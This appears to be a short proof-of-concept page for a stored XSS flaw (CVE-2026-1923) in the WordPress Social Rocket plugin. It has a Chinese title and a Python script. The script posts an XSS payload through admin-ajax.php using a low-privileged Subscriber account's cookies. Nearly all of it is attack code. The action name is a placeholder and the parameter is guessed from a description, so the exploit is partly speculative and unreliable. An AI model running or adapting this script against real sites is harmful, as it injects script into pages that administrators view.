CVE-2026-1923 WordPress Social Rocket插件存储型XSS漏洞

# PoC Concept for CVE-2026-1923 # This script demonstrates how a low-privileged user might inject a payload. import requests target_url = "http://example.com/wp-admin/admin-ajax.php" # Cookies for a Subscriber-level account attacker_cookies = { "wordpress_logged_in_...": "session_id_here", "wordpress_sec_...": "session_sec_here" } # Malicious payload to be stored xss_payload = "<img src=x onerror=alert('XSS')>" # The vulnerable parameter 'id' based on the description post_data = { "action": "social_rocket_some_action", "id": xss_payload } try: response = requests.post(target_url, cookies=attacker_cookies, data=post_data) if response.status_code == 200: print("Payload sent successfully. Check the backend page for execution.") else: print(f"Request failed with status code: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")